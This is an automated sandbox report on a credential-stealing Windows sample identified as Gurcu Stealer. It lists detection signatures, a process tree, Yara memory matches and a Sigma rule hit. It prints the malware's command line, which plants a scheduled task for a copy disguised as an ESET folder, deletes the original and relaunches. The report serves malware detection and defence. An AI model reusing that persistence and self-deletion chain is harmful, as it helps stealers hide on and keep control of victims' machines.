Edit tour

Windows Analysis Report
tDLozbx48F.exe

Overview

General Information

Sample name:	tDLozbx48F.exe renamed because original name is a hash value
Original sample name:	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe
Analysis ID:	1566277
MD5:	a338043c6b5260df6b7ce4c4ec3d1b80
SHA1:	087a787a34ee05478bfa07b50fd39c8367b0a157
SHA256:	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50
Infos:

Detection

Gurcu Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Gurcu Stealer

AI detected suspicious sample

Contains functionality to capture screen (.Net source)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries Google from non browser process on port 80

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Self deletion via cmd or bat file

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses ping.exe to check the status of other devices and networks

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64_ra

tDLozbx48F.exe (PID: 6420 cmdline: "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" MD5: A338043C6B5260DF6B7CE4C4EC3D1B80)

cmd.exe (PID: 6340 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4248 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6488 cmdline: ping 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

schtasks.exe (PID: 5944 cmdline: schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

tDLozbx48F.exe (PID: 4212 cmdline: "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" MD5: A338043C6B5260DF6B7CE4C4EC3D1B80)

tDLozbx48F.exe (PID: 5204 cmdline: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe MD5: A338043C6B5260DF6B7CE4C4EC3D1B80)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
tDLozbx48F.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.2428626323.0000021B52A69000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580460000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AF7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B83000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529CB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5803A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52938000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A72000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B6E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580486000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580531000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F58045A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5804ED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5803E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A75000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AEB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52974000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52971000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5805AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5804AC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580457000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F58058A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AA7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A787000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52922000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AE8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580408000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F58052B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A6C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F58038E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580364000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5804AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A49000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B53000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B56000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AA4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B5296B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B5290C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A764000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B03000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529C8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B5291F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580593000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A761000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AB6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580599000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B5298B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5804B8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529F4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5805C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B77000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5804F6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B6B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AAA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AFA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B4D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B5C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A78000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5803B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A4C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A75B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B5298E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B4A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5803B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B62000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B5294E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B65000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A8E6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52935000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A7D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A831000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B50000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A43000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B8C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A840000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580489000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A3A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A7E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AFD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580537000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A8F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5803CB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52988000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B5F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F58048C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A17000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5804F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580534000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B7D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A802000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A75E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A6F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580596000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5804A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5804F3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F58053A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B86000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F58045D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5805C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A14000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B7A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5805AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B5296E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A7D3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A8FB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580437000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AB3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AAD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B68000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A919000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F58052E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B529B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
00000001.00000002.1261960413.0000022E4A8E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B89000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A7B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52A40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52B74000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000E.00000002.2428626323.0000021B52AB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F5804E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GurcuStealer	Yara detected Gurcu Stealer	Joe Security
0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: tDLozbx48F.exe PID: 4212	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: tDLozbx48F.exe PID: 5204	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 145 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 